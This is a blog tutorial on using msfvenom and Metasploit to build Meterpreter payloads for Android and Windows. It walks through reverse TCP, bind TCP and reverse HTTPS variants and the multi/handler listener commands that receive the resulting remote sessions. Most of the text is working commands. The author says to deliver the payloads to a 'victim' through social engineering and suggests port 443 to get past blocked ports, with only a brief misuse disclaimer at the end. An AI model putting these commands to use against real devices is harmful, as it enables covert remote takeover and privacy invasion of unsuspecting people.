What Is msfvenom? How To Use It?

Reading Time: 3 minutes

So when it comes to hacking a system, what basically a newbie hacker can think of. Like listening to the traffic of a particular system without getting noticed. So it needs a payload to be deployed at the target system. There comes the msfvenom. It is a combination of msfpayload and msfencode. It is fast and uses a single instance. Msfvenom contains standard command-line options. We can generate payloads for many platforms like Android, Windows, Unix, Nodejs, Cisco, and much more.

What Is msfvenom? How To Use It?

Basically, It is used to generate and output all of the various types of shellcode that are available in Metasploit. We have some prerequisites for using msfvenom.

  • Kali Linux
  • Android Phone

Let’s generate a payload for android devices:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.123.123 lport=xxxx > /home/Desktop/file.apk

So -p is a flag to tell the console about the target system. Meterpreter is the payload that helps to explore the target machine. Reverse_tcp is the protocol for android devices to make a connection. Lhost contains the IP of the listening device. Lport is the port of the listening machine on which it will listen to the incoming traffic from the target. > This is used to give a location where this generated payload will be saved once it’s created.

Once the payload is ready then this payload is to be transferred to the victim’s Android device and to be installed. Now we have to run msfconsole in another terminal. Just write the below command to start the msfconsole:

msfconsole

First, we have to use the multi handler and for that, we have to write:

use exploit/multi/handler

Secondly, we set the payload again:

set payload android/meterpreter/reverse_tcp

Thirdly, we set the lhost:

set lhost 192.168.123.123

Then comes the lport:

set lport xxxx

And finally we hit exploit to explore the target device:

exploit

We can make payload for windows as well and we have three ways to do that:

1. Bind shell

A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.

Now in terminal, write:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

This will create a payload on your desktop. This payload has to be sent to the victim machine by any social engineering method and have it run on that system.

Then we have a set of commands:

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.0.xxx
set lport xxxx
exploit

Once the file is executed on the victim machine, it will give you a meterpreter session starting from meterpreter >. The bind_tcp option is helpful in case we get disconnected from the victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.

2. Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

Now, we have to generate the payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.xxx lport=xxxx -f exe > / root/Desktop/reverse_tcp.exe

Once the payload is generated and sent to the victim for execution, we will start our next step like below:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.xxx
set lport xxxx
exploit

Once the file is executed on the victim machine, it will give you a meterpreter session starting from meterpreter >.

3. HTTPS Payload

Now, what if the victim blocks the TCP and Bind ports. Well in that case we have an HTTPS port open which is 443. Let’s create a payload for that. Type:

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.xxx lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and sent to the victim for execution, we will start our next step like below:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.xxx
set lport 443
exploit

Once the file is executed on the victim machine, it will give you a meterpreter session starting from meterpreter >.

We can generate payloads for many more systems like I have mentioned above. I request you all not to misuse this knowledge as this may cause you serious consequences. Invading someone’s privacy through digital methods comes under cybercrime and can cause imprisonment also.

For more information, click here.

Scala Future

Written by 

Shubham Saini is a DevOps Engineer who loves to play with DevOps tools, Security methods and is also interested in Ethical Hacking & Cyber Security. He is a gamer also.

Leave a Reply